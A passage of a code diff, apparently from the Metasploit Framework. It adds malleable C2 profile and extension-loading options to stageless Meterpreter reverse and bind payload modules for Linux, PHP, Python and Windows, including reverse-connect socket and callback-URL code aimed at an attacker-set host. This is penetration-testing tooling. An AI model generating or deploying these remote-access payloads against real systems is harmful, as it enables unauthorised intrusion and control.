     payload = MetasploitPayloads::Mettle.new('mips64-linux-muslsf', generate_config(opts)).to_binary :exec

--- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb
@@ -32,11 +32,19 @@ module MetasploitModule
         'Session'       => Msf::Sessions::Meterpreter_mips64_Linux
       )
     )
+
+    register_options([
+      OptString.new('MALLEABLEC2', [false, 'Path to a file containing the malleable C2 profile']),
+      OptString.new('EXTENSIONS', [false, 'Comma-separate list of extensions to load'])
+    ])
   end
 
   def generate(_opts = {})
     opts = {
       scheme: 'https',
+      c2_profile: datastore['MALLEABLEC2'],
+      extensions: (datastore['EXTENSIONS'] || '').split(','),
+      mettle_platform: 'mips64-linux-muslsf',
       stageless: true
     }.merge(mettle_logging_config)
     payload = MetasploitPayloads::Mettle.new('mips64-linux-muslsf', generate_config(opts)).to_binary :exec

--- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb
@@ -32,11 +32,17 @@ module MetasploitModule
         'Session'       => Msf::Sessions::Meterpreter_mips64_Linux
       )
     )
+
+    register_options([
+      OptString.new('EXTENSIONS', [false, 'Comma-separate list of extensions to load'])
+    ])
   end
 
   def generate(_opts = {})
     opts = {
       scheme: 'tcp',
+      extensions: (datastore['EXTENSIONS'] || '').split(','),
+      mettle_platform: 'mips64-linux-muslsf',
       stageless: true
     }.merge(mettle_logging_config)
     payload = MetasploitPayloads::Mettle.new('mips64-linux-muslsf', generate_config(opts)).to_binary :exec

--- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb
@@ -32,11 +32,19 @@ module MetasploitModule
         'Session'       => Msf::Sessions::Meterpreter_mipsbe_Linux
       )
     )
+
+    register_options([
+      OptString.new('MALLEABLEC2', [false, 'Path to a file containing the malleable C2 profile']),
+      OptString.new('EXTENSIONS', [false, 'Comma-separate list of extensions to load'])
+    ])
   end
 
   def generate(_opts = {})
     opts = {
       scheme: 'http',
+      c2_profile: datastore['MALLEABLEC2'],
+      extensions: (datastore['EXTENSIONS'] || '').split(','),
+      mettle_platform: 'mips-linux-muslsf',
       stageless: true
     }.merge(mettle_logging_config)
     payload = MetasploitPayloads::Mettle.new('mips-linux-muslsf', generate_config(opts)).to_binary :exec

--- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb
@@ -32,11 +32,19 @@ module MetasploitModule
         'Session'       => Msf::Sessions::Meterpreter_mipsbe_Linux
       )
     )
+
+    register_options([
+      OptString.new('MALLEABLEC2', [false, 'Path to a file containing the malleable C2 profile']),
+      OptString.new('EXTENSIONS', [false, 'Comma-separate list of extensions to load'])
+    ])
   end
 
   def generate(_opts = {})
     opts = {
       scheme: 'https',
+      c2_profile: datastore['MALLEABLEC2'],
+      extensions: (datastore['EXTENSIONS'] || '').split(','),
+      mettle_platform: 'mips-linux-muslsf',
       stageless: true
     }.merge(mettle_logging_config)
     payload = MetasploitPayloads::Mettle.new('mips-linux-muslsf', generate_config(opts)).to_binary :exec

--- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb
@@ -32,11 +32,17 @@ module MetasploitModule
         'Session'       => Msf::Sessions::Meterpreter_mipsbe_Linux
       )
     )
+
+    register_options([
+      OptString.new('EXTENSIONS', [false, 'Comma-separate list of extensions to load'])
+    ])
   end
 
   def generate(_opts = {})
     opts = {
       scheme: 'tcp',
+      extensions: (datastore['EXTENSIONS'] || '').split(','),
+      mettle_platform: 'mips-linux-muslsf',
       stageless: true
     }.merge(mettle_logging_config)
     payload = MetasploitPayloads::Mettle.new('mips-linux-muslsf', generate_config(opts)).to_binary :exec

--- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb
@@ -32,11 +32,19 @@ module MetasploitModule
         'Session'       => Msf::Sessions::Meterpreter_mipsle_Linux
       )
     )
+
+    register_options([
+      OptString.new('MALLEABLEC2', [false, 'Path to a file containing the malleable C2 profile']),
+      OptString.new('EXTENSIONS', [false, 'Comma-separate list of extensions to load'])
+    ])
   end
 
   def generate(_opts = {})
     opts = {
       scheme: 'http',
+      c2_profile: datastore['MALLEABLEC2'],
+      extensions: (datastore['EXTENSIONS'] || '').split(','),
+      mettle_platform: 'mipsel-linux-muslsf',
       stageless: true
     }.merge(mettle_logging_config)
     payload = MetasploitPayloads::Mettle.new('mipsel-linux-muslsf', generate_config(opts)).to_binary :exec

--- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb
@@ -32,11 +32,19 @@ module MetasploitModule
         'Session'       => Msf::Sessions::Meterpreter_mipsle_Linux
       )
     )
+
+    register_options([
+      OptString.new('MALLEABLEC2', [false, 'Path to a file containing the malleable C2 profile']),
+      OptString.new('EXTENSIONS', [false, 'Comma-separate list of extensions to load'])
+    ])
   end
 
   def generate(_opts = {})
     opts = {
       scheme: 'https',
+      c2_profile: datastore['MALLEABLEC2'],
+      extensions: (datastore['EXTENSIONS'] || '').split(','),
+      mettle_platform: 'mipsel-linux-muslsf',
       stageless: true
     }.merge(mettle_logging_config)
     payload = MetasploitPayloads::Mettle.new('mipsel-linux-muslsf', generate_config(opts)).to_binary :exec

--- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb
@@ -32,11 +32,17 @@ module MetasploitModule
         'Session'       => Msf::Sessions::Meterpreter_mipsle_Linux
       )
     )
+
+    register_options([
+      OptString.new('EXTENSIONS', [false, 'Comma-separate list of extensions to load'])
+    ])
   end
 
   def generate(_opts = {})
     opts = {
       scheme: 'tcp',
+      extensions: (datastore['EXTENSIONS'] || '').split(','),
+      mettle_platform: 'mipsel-linux-muslsf',
       stageless: true
     }.merge(mettle_logging_config)
     payload = MetasploitPayloads::Mettle.new('mipsel-linux-muslsf', generate_config(opts)).to_binary :exec

--- a/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb
@@ -32,11 +32,16 @@ module MetasploitModule
         'Session'       => Msf::Sessions::Meterpreter_x64_Linux
       )
     )
+
+    register_options([
+      OptString.new('MALLEABLEC2', [false, 'Path to a file containing the malleable C2 profile']),
+    ])
   end
 
   def generate(_opts = {})
     opts = {
       scheme: 'http',
+      c2_profile: datastore['MALLEABLEC2'],
       stageless: true
     }.merge(mettle_logging_config)
     payload = MetasploitPayloads::Mettle.new('x86_64-linux-musl', generate_config(opts)).to_binary :exec

--- a/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb
@@ -35,6 +35,7 @@ module MetasploitModule
 
     register_options([
       OptString.new('MALLEABLEC2', [false, 'Path to a file containing the malleable C2 profile']),
+      OptString.new('EXTENSIONS', [false, 'Comma-separate list of extensions to load'])
     ])
   end
 
@@ -42,6 +43,8 @@ module MetasploitModule
     opts = {
       scheme: 'http',
       c2_profile: datastore['MALLEABLEC2'],
+      extensions: (datastore['EXTENSIONS'] || '').split(','),
+      mettle_platform: 'x86_64-linux-musl',
       stageless: true
     }.merge(mettle_logging_config)
     payload = MetasploitPayloads::Mettle.new('x86_64-linux-musl', generate_config(opts)).to_binary :exec

--- a/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb
@@ -32,11 +32,16 @@ module MetasploitModule
         'Session'       => Msf::Sessions::Meterpreter_x64_Linux
       )
     )
+
+    register_options([
+      OptString.new('MALLEABLEC2', [false, 'Path to a file containing the malleable C2 profile']),
+    ])
   end
 
   def generate(_opts = {})
     opts = {
       scheme: 'https',
+      c2_profile: datastore['MALLEABLEC2'],
       stageless: true
     }.merge(mettle_logging_config)
     payload = MetasploitPayloads::Mettle.new('x86_64-linux-musl', generate_config(opts)).to_binary :exec

--- a/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb
@@ -35,6 +35,7 @@ module MetasploitModule
 
     register_options([
       OptString.new('MALLEABLEC2', [false, 'Path to a file containing the malleable C2 profile']),
+      OptString.new('EXTENSIONS', [false, 'Comma-separate list of extensions to load'])
     ])
   end
 
@@ -42,6 +43,8 @@ module MetasploitModule
     opts = {
       scheme: 'https',
       c2_profile: datastore['MALLEABLEC2'],
+      extensions: (datastore['EXTENSIONS'] || '').split(','),
+      mettle_platform: 'x86_64-linux-musl',
       stageless: true
     }.merge(mettle_logging_config)
     payload = MetasploitPayloads::Mettle.new('x86_64-linux-musl', generate_config(opts)).to_binary :exec

--- a/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb
@@ -32,11 +32,17 @@ module MetasploitModule
         'Session'       => Msf::Sessions::Meterpreter_x64_Linux
       )
     )
+
+    register_options([
+      OptString.new('EXTENSIONS', [false, 'Comma-separate list of extensions to load'])
+    ])
   end
 
   def generate(_opts = {})
     opts = {
       scheme: 'tcp',
+      extensions: (datastore['EXTENSIONS'] || '').split(','),
+      mettle_platform: 'x86_64-linux-musl',
       stageless: true
     }.merge(mettle_logging_config)
     payload = MetasploitPayloads::Mettle.new('x86_64-linux-musl', generate_config(opts)).to_binary :exec

--- a/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb
@@ -32,11 +32,16 @@ module MetasploitModule
         'Session'       => Msf::Sessions::Meterpreter_x86_Linux
       )
     )
+
+    register_options([
+      OptString.new('MALLEABLEC2', [false, 'Path to a file containing the malleable C2 profile']),
+    ])
   end
 
   def generate(_opts = {})
     opts = {
       scheme: 'http',
+      c2_profile: datastore['MALLEABLEC2'],
       stageless: true
     }.merge(mettle_logging_config)
     payload = MetasploitPayloads::Mettle.new('i486-linux-musl', generate_config(opts)).to_binary :exec

--- a/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb
@@ -35,6 +35,7 @@ module MetasploitModule
 
     register_options([
       OptString.new('MALLEABLEC2', [false, 'Path to a file containing the malleable C2 profile']),
+      OptString.new('EXTENSIONS', [false, 'Comma-separate list of extensions to load'])
     ])
   end
 
@@ -42,6 +43,8 @@ module MetasploitModule
     opts = {
       scheme: 'http',
       c2_profile: datastore['MALLEABLEC2'],
+      extensions: (datastore['EXTENSIONS'] || '').split(','),
+      mettle_platform: 'i486-linux-musl',
       stageless: true
     }.merge(mettle_logging_config)
     payload = MetasploitPayloads::Mettle.new('i486-linux-musl', generate_config(opts)).to_binary :exec

--- a/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb
@@ -35,6 +35,7 @@ module MetasploitModule
 
     register_options([
       OptString.new('MALLEABLEC2', [false, 'Path to a file containing the malleable C2 profile']),
+      OptString.new('EXTENSIONS', [false, 'Comma-separate list of extensions to load'])
     ])
   end
 
@@ -42,6 +43,8 @@ module MetasploitModule
     opts = {
       scheme: 'https',
       c2_profile: datastore['MALLEABLEC2'],
+      extensions: (datastore['EXTENSIONS'] || '').split(','),
+      mettle_platform: 'i486-linux-musl',
       stageless: true
     }.merge(mettle_logging_config)
     payload = MetasploitPayloads::Mettle.new('i486-linux-musl', generate_config(opts)).to_binary :exec

--- a/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb
@@ -32,11 +32,16 @@ module MetasploitModule
         'Session'       => Msf::Sessions::Meterpreter_x86_Linux
       )
     )
+
+    register_options([
+      OptString.new('MALLEABLEC2', [false, 'Path to a file containing the malleable C2 profile']),
+    ])
   end
 
   def generate(_opts = {})
     opts = {
       scheme: 'https',
+      c2_profile: datastore['MALLEABLEC2'],
       stageless: true
     }.merge(mettle_logging_config)
     payload = MetasploitPayloads::Mettle.new('i486-linux-musl', generate_config(opts)).to_binary :exec

--- a/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb
@@ -32,11 +32,17 @@ module MetasploitModule
         'Session'       => Msf::Sessions::Meterpreter_x86_Linux
       )
     )
+
+    register_options([
+      OptString.new('EXTENSIONS', [false, 'Comma-separate list of extensions to load'])
+    ])
   end
 
   def generate(_opts = {})
     opts = {
       scheme: 'tcp',
+      extensions: (datastore['EXTENSIONS'] || '').split(','),
+      mettle_platform: 'i486-linux-musl',
       stageless: true
     }.merge(mettle_logging_config)
     payload = MetasploitPayloads::Mettle.new('i486-linux-musl', generate_config(opts)).to_binary :exec

--- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb
@@ -30,11 +30,19 @@ module MetasploitModule
         'Session'       => Msf::Sessions::Meterpreter_zarch_Linux
       )
     )
+
+    register_options([
+      OptString.new('MALLEABLEC2', [false, 'Path to a file containing the malleable C2 profile']),
+      OptString.new('EXTENSIONS', [false, 'Comma-separate list of extensions to load'])
+    ])
   end
 
   def generate(_opts = {})
     opts = {
       scheme: 'http',
+      c2_profile: datastore['MALLEABLEC2'],
+      extensions: (datastore['EXTENSIONS'] || '').split(','),
+      mettle_platform: 's390x-linux-musl',
       stageless: true
     }.merge(mettle_logging_config)
     payload = MetasploitPayloads::Mettle.new('s390x-linux-musl', generate_config(opts)).to_binary :exec

--- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb
@@ -30,11 +30,19 @@ module MetasploitModule
         'Session'       => Msf::Sessions::Meterpreter_zarch_Linux
       )
     )
+
+    register_options([
+      OptString.new('MALLEABLEC2', [false, 'Path to a file containing the malleable C2 profile']),
+      OptString.new('EXTENSIONS', [false, 'Comma-separate list of extensions to load'])
+    ])
   end
 
   def generate(_opts = {})
     opts = {
       scheme: 'https',
+      c2_profile: datastore['MALLEABLEC2'],
+      extensions: (datastore['EXTENSIONS'] || '').split(','),
+      mettle_platform: 's390x-linux-musl',
       stageless: true
     }.merge(mettle_logging_config)
     payload = MetasploitPayloads::Mettle.new('s390x-linux-musl', generate_config(opts)).to_binary :exec

--- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb
@@ -30,11 +30,17 @@ module MetasploitModule
         'Session'       => Msf::Sessions::Meterpreter_zarch_Linux
       )
     )
+
+    register_options([
+      OptString.new('EXTENSIONS', [false, 'Comma-separate list of extensions to load'])
+    ])
   end
 
   def generate(_opts = {})
     opts = {
       scheme: 'tcp',
+      extensions: (datastore['EXTENSIONS'] || '').split(','),
+      mettle_platform: 's390x-linux-musl',
       stageless: true
     }.merge(mettle_logging_config)
     payload = MetasploitPayloads::Mettle.new('s390x-linux-musl', generate_config(opts)).to_binary :exec

--- a/modules/payloads/singles/php/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/php/meterpreter_reverse_http.rb
@@ -29,6 +29,7 @@ module MetasploitModule
 
     register_options([
       OptString.new('MALLEABLEC2', [false, 'Path to a file containing the malleable C2 profile']),
+      OptString.new('EXTENSIONS', [false, 'Comma-separate list of extensions to load'])
     ])
   end
 
@@ -44,7 +45,9 @@ module MetasploitModule
       expiration: (ds[:expiration] || ds['SessionExpirationTimeout']).to_i,
       uuid: opts[:uuid],
       transports: opts[:transport_config],
-      stageless: true,
+      extensions: (ds['EXTENSIONS'] || '').split(','),
+      ext_format: 'php',
+      stageless: true
     }.merge(meterpreter_logging_config(opts))
 
     config = Rex::Payloads::Meterpreter::Config.new(config_opts)

--- a/modules/payloads/singles/php/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/php/meterpreter_reverse_http.rb
@@ -26,6 +26,10 @@ module MetasploitModule
         'Session' => Msf::Sessions::Meterpreter_Php_Php
       )
     )
+
+    register_options([
+      OptString.new('MALLEABLEC2', [false, 'Path to a file containing the malleable C2 profile']),
+    ])
   end
 
   def generate_config(opts = {})
@@ -63,6 +67,7 @@ module MetasploitModule
     config_block = Rex::Text.encode_base64(generate_config(
       url: url,
       scheme: opts[:scheme],
+      c2_profile: datastore['MALLEABLEC2'],
       stageless: true
     ))
     met = met.sub('"CONFIG_BLOCK", ""', "\"CONFIG_BLOCK\", \"#{config_block}\"")

--- a/modules/payloads/singles/php/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/php/meterpreter_reverse_http.rb
@@ -7,22 +7,22 @@ module MetasploitModule
   CachedSize = :dynamic
 
   include Msf::Payload::Single
-  include Msf::Payload::Php::ReverseTcp
+  include Msf::Payload::Php::ReverseHttp
   include Msf::Payload::TransportConfig
   include Msf::Payload::UUID::Options
-  include Msf::Sessions::MeterpreterOptions::Php
+  include Msf::Sessions::MeterpreterOptions
 
   def initialize(info = {})
     super(
-      update_info(
+      merge_info(
         info,
-        'Name' => 'PHP Meterpreter, Reverse TCP Inline',
-        'Description' => 'Connect back to attacker and spawn a Meterpreter server (PHP)',
-        'Author' => ['egypt'],
+        'Name' => 'PHP Meterpreter, Reverse HTTP Inline',
+        'Description' => 'Connect back to attacker and spawn a Meterpreter server via HTTP (PHP)',
+        'Author' => 'OJ Reeves',
+        'License' => MSF_LICENSE,
         'Platform' => 'php',
         'Arch' => ARCH_PHP,
-        'License' => MSF_LICENSE,
-        'Handler' => Msf::Handler::ReverseTcp,
+        'Handler' => Msf::Handler::ReverseHttp,
         'Session' => Msf::Sessions::Meterpreter_Php_Php
       )
     )
@@ -32,25 +32,39 @@ module MetasploitModule
     ds = opts[:datastore] || datastore
     opts[:uuid] ||= generate_payload_uuid
 
-    opts[:transport_config] ||= [transport_config_reverse_tcp(opts)]
+    opts[:transport_config] ||= [transport_config_reverse_http(opts)]
 
     config_opts = {
-      ascii_str:         true,
+      ascii_str: true,
       null_session_guid: true,
-      expiration:        (ds[:expiration] || ds['SessionExpirationTimeout']).to_i,
-      uuid:              opts[:uuid],
-      transports:        opts[:transport_config],
-      stageless:         true,
+      expiration: (ds[:expiration] || ds['SessionExpirationTimeout']).to_i,
+      uuid: opts[:uuid],
+      transports: opts[:transport_config],
+      stageless: true,
     }.merge(meterpreter_logging_config(opts))
 
     config = Rex::Payloads::Meterpreter::Config.new(config_opts)
     config.to_b
   end
 
-  def generate(_opts = {})
+  def generate_reverse_http(opts = {})
+    opts[:uri_uuid_mode] = :init_connect
+
+    ds = opts[:datastore] || datastore
+    opts.merge!({
+      host: ds['LHOST'] || '127.127.127.127',
+      port: ds['LPORT']
+    })
+    opts[:scheme] = 'http' if opts[:scheme].nil?
+    url = generate_callback_url(opts)
+
     met = MetasploitPayloads.read('meterpreter', 'meterpreter.php')
 
-    config_block = Rex::Text.encode_base64(generate_config(_opts))
+    config_block = Rex::Text.encode_base64(generate_config(
+      url: url,
+      scheme: opts[:scheme],
+      stageless: true
+    ))
     met = met.sub('"CONFIG_BLOCK", ""', "\"CONFIG_BLOCK\", \"#{config_block}\"")
 
     if datastore['MeterpreterDebugBuild']

--- a/modules/payloads/singles/php/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/php/meterpreter_reverse_https.rb
@@ -29,6 +29,7 @@ module MetasploitModule
 
     register_options([
       OptString.new('MALLEABLEC2', [false, 'Path to a file containing the malleable C2 profile']),
+      OptString.new('EXTENSIONS', [false, 'Comma-separate list of extensions to load'])
     ])
   end
 
@@ -44,7 +45,9 @@ module MetasploitModule
       expiration: (ds[:expiration] || ds['SessionExpirationTimeout']).to_i,
       uuid: opts[:uuid],
       transports: opts[:transport_config],
-      stageless: true,
+      extensions: (ds['EXTENSIONS'] || '').split(','),
+      ext_format: 'php',
+      stageless: true
     }.merge(meterpreter_logging_config(opts))
 
     config = Rex::Payloads::Meterpreter::Config.new(config_opts)

--- a/modules/payloads/singles/php/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/php/meterpreter_reverse_https.rb
@@ -7,22 +7,22 @@ module MetasploitModule
   CachedSize = :dynamic
 
   include Msf::Payload::Single
-  include Msf::Payload::Php::ReverseTcp
+  include Msf::Payload::Php::ReverseHttp
   include Msf::Payload::TransportConfig
   include Msf::Payload::UUID::Options
-  include Msf::Sessions::MeterpreterOptions::Php
+  include Msf::Sessions::MeterpreterOptions
 
   def initialize(info = {})
     super(
-      update_info(
+      merge_info(
         info,
-        'Name' => 'PHP Meterpreter, Reverse TCP Inline',
-        'Description' => 'Connect back to attacker and spawn a Meterpreter server (PHP)',
-        'Author' => ['egypt'],
+        'Name' => 'PHP Meterpreter, Reverse HTTPS Inline',
+        'Description' => 'Connect back to attacker and spawn a Meterpreter server via HTTPS (PHP)',
+        'Author' => 'OJ Reeves',
+        'License' => MSF_LICENSE,
         'Platform' => 'php',
         'Arch' => ARCH_PHP,
-        'License' => MSF_LICENSE,
-        'Handler' => Msf::Handler::ReverseTcp,
+        'Handler' => Msf::Handler::ReverseHttps,
         'Session' => Msf::Sessions::Meterpreter_Php_Php
       )
     )
@@ -32,25 +32,39 @@ module MetasploitModule
     ds = opts[:datastore] || datastore
     opts[:uuid] ||= generate_payload_uuid
 
-    opts[:transport_config] ||= [transport_config_reverse_tcp(opts)]
+    opts[:transport_config] ||= [transport_config_reverse_https(opts)]
 
     config_opts = {
-      ascii_str:         true,
+      ascii_str: true,
       null_session_guid: true,
-      expiration:        (ds[:expiration] || ds['SessionExpirationTimeout']).to_i,
-      uuid:              opts[:uuid],
-      transports:        opts[:transport_config],
-      stageless:         true,
+      expiration: (ds[:expiration] || ds['SessionExpirationTimeout']).to_i,
+      uuid: opts[:uuid],
+      transports: opts[:transport_config],
+      stageless: true,
     }.merge(meterpreter_logging_config(opts))
 
     config = Rex::Payloads::Meterpreter::Config.new(config_opts)
     config.to_b
   end
 
-  def generate(_opts = {})
+  def generate_reverse_http(opts = {})
+    opts[:scheme] = 'https'
+    opts[:uri_uuid_mode] = :init_connect
+
+    ds = opts[:datastore] || datastore
+    opts.merge!({
+      host: ds['LHOST'] || '127.127.127.127',
+      port: ds['LPORT']
+    })
+    url = generate_callback_url(opts)
+
     met = MetasploitPayloads.read('meterpreter', 'meterpreter.php')
 
-    config_block = Rex::Text.encode_base64(generate_config(_opts))
+    config_block = Rex::Text.encode_base64(generate_config(
+      url: url,
+      scheme: 'https',
+      stageless: true
+    ))
     met = met.sub('"CONFIG_BLOCK", ""', "\"CONFIG_BLOCK\", \"#{config_block}\"")
 
     if datastore['MeterpreterDebugBuild']

--- a/modules/payloads/singles/php/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/php/meterpreter_reverse_https.rb
@@ -26,6 +26,10 @@ module MetasploitModule
         'Session' => Msf::Sessions::Meterpreter_Php_Php
       )
     )
+
+    register_options([
+      OptString.new('MALLEABLEC2', [false, 'Path to a file containing the malleable C2 profile']),
+    ])
   end
 
   def generate_config(opts = {})
@@ -63,6 +67,7 @@ module MetasploitModule
     config_block = Rex::Text.encode_base64(generate_config(
       url: url,
       scheme: 'https',
+      c2_profile: datastore['MALLEABLEC2'],
       stageless: true
     ))
     met = met.sub('"CONFIG_BLOCK", ""', "\"CONFIG_BLOCK\", \"#{config_block}\"")

--- a/modules/payloads/singles/php/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/php/meterpreter_reverse_tcp.rb
@@ -26,6 +26,10 @@ module MetasploitModule
         'Session' => Msf::Sessions::Meterpreter_Php_Php
       )
     )
+
+    register_options([
+      OptString.new('EXTENSIONS', [false, 'Comma-separate list of extensions to load'])
+    ])
   end
 
   def generate_config(opts = {})
@@ -40,6 +44,8 @@ module MetasploitModule
       expiration:        (ds[:expiration] || ds['SessionExpirationTimeout']).to_i,
       uuid:              opts[:uuid],
       transports:        opts[:transport_config],
+      extensions:        (ds['EXTENSIONS'] || '').split(','),
+      ext_format:        'php',
       stageless:         true,
     }.merge(meterpreter_logging_config(opts))
 

--- a/modules/payloads/singles/python/meterpreter_bind_tcp.rb
+++ b/modules/payloads/singles/python/meterpreter_bind_tcp.rb
@@ -25,6 +25,10 @@ module MetasploitModule
         'Session' => Msf::Sessions::Meterpreter_Python_Python
       )
     )
+
+    register_options([
+      OptString.new('EXTENSIONS', [false, 'Comma-separate list of extensions to load'])
+    ])
   end
 
   def generate_bind_tcp(opts = {})
@@ -34,6 +38,7 @@ module MetasploitModule
     socket_setup << "s, address = bind_sock.accept()\n"
     opts[:stageless_tcp_socket_setup] = socket_setup
     opts[:stageless] = true
+    opts[:extensions] = (datastore['EXTENSIONS'] || '').split(',')
 
     met = stage_meterpreter(opts)
     py_create_exec_stub(met)

--- a/modules/payloads/singles/python/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/python/meterpreter_reverse_http.rb
@@ -26,6 +26,10 @@ module MetasploitModule
       )
     )
 
+    register_options([
+      OptString.new('MALLEABLEC2', [false, 'Path to a file containing the malleable C2 profile']),
+    ])
+
     register_advanced_options(
       Msf::Opt.http_header_options +
       Msf::Opt.http_proxy_options
@@ -34,11 +38,13 @@ module MetasploitModule
 
   def generate_reverse_http(opts = {})
     opts[:uri_uuid_mode] = :init_connect
+
     met = stage_meterpreter({
       url: generate_callback_url(opts),
       http_user_agent: opts[:user_agent],
       http_proxy_host: opts[:proxy_host],
       http_proxy_port: opts[:proxy_port],
+      c2_profile: datastore['MALLEABLEC2'],
       stageless: true
     })
 

--- a/modules/payloads/singles/python/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/python/meterpreter_reverse_http.rb
@@ -28,6 +28,7 @@ module MetasploitModule
 
     register_options([
       OptString.new('MALLEABLEC2', [false, 'Path to a file containing the malleable C2 profile']),
+      OptString.new('EXTENSIONS', [false, 'Comma-separate list of extensions to load'])
     ])
 
     register_advanced_options(
@@ -45,6 +46,7 @@ module MetasploitModule
       http_proxy_host: opts[:proxy_host],
       http_proxy_port: opts[:proxy_port],
       c2_profile: datastore['MALLEABLEC2'],
+      extensions: (datastore['EXTENSIONS'] || '').split(','),
       stageless: true
     })
 

--- a/modules/payloads/singles/python/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/python/meterpreter_reverse_https.rb
@@ -26,6 +26,10 @@ module MetasploitModule
       )
     )
 
+    register_options([
+      OptString.new('MALLEABLEC2', [false, 'Path to a file containing the malleable C2 profile']),
+    ])
+
     register_advanced_options(
       Msf::Opt.http_header_options +
       Msf::Opt.http_proxy_options
@@ -35,11 +39,13 @@ module MetasploitModule
   def generate_reverse_http(opts = {})
     opts[:scheme] = 'https'
     opts[:uri_uuid_mode] = :init_connect
+
     met = stage_meterpreter({
       url: generate_callback_url(opts),
       http_user_agent: opts[:user_agent],
       http_proxy_host: opts[:proxy_host],
       http_proxy_port: opts[:proxy_port],
+      c2_profile: datastore['MALLEABLEC2'],
       stageless: true
     })
 

--- a/modules/payloads/singles/python/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/python/meterpreter_reverse_https.rb
@@ -28,6 +28,7 @@ module MetasploitModule
 
     register_options([
       OptString.new('MALLEABLEC2', [false, 'Path to a file containing the malleable C2 profile']),
+      OptString.new('EXTENSIONS', [false, 'Comma-separate list of extensions to load'])
     ])
 
     register_advanced_options(
@@ -46,6 +47,7 @@ module MetasploitModule
       http_proxy_host: opts[:proxy_host],
       http_proxy_port: opts[:proxy_port],
       c2_profile: datastore['MALLEABLEC2'],
+      extensions: (datastore['EXTENSIONS'] || '').split(','),
       stageless: true
     })
 

--- a/modules/payloads/singles/python/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/python/meterpreter_reverse_tcp.rb
@@ -25,6 +25,10 @@ module MetasploitModule
         'Session' => Msf::Sessions::Meterpreter_Python_Python
       )
     )
+
+    register_options([
+      OptString.new('EXTENSIONS', [false, 'Comma-separate list of extensions to load'])
+    ])
   end
 
   def generate_reverse_tcp(opts = {})
@@ -32,6 +36,7 @@ module MetasploitModule
     socket_setup << "s.connect(('#{opts[:host]}',#{opts[:port]}))\n"
     opts[:stageless_tcp_socket_setup] = socket_setup
     opts[:stageless] = true
+    opts[:extensions] = (datastore['EXTENSIONS'] || '').split(',')
 
     met = stage_meterpreter(opts)
     py_create_exec_stub(met)

--- a/modules/payloads/singles/windows/meterpreter_bind_named_pipe.rb
+++ b/modules/payloads/singles/windows/meterpreter_bind_named_pipe.rb
@@ -58,6 +58,6 @@ module MetasploitModule
     config = Rex::Payloads::Meterpreter::Config.new(config_opts)
 
     # return the binary version of it
-    config.to_b
+    "\x00" * 8 + config.to_b
   end
 end

--- a/modules/payloads/singles/windows/meterpreter_bind_named_pipe.rb
+++ b/modules/payloads/singles/windows/meterpreter_bind_named_pipe.rb
@@ -49,6 +49,7 @@ module MetasploitModule
       uuid: opts[:uuid],
       transports: [transport_config_bind_named_pipe(opts)],
       extensions: (datastore['EXTENSIONS'] || '').split(','),
+      ext_format: 'x86.dll',
       ext_init: datastore['EXTINIT'] || '',
       stageless: true
     }.merge(meterpreter_logging_config(opts))

--- a/modules/payloads/singles/windows/meterpreter_bind_tcp.rb
+++ b/modules/payloads/singles/windows/meterpreter_bind_tcp.rb
@@ -58,6 +58,6 @@ module MetasploitModule
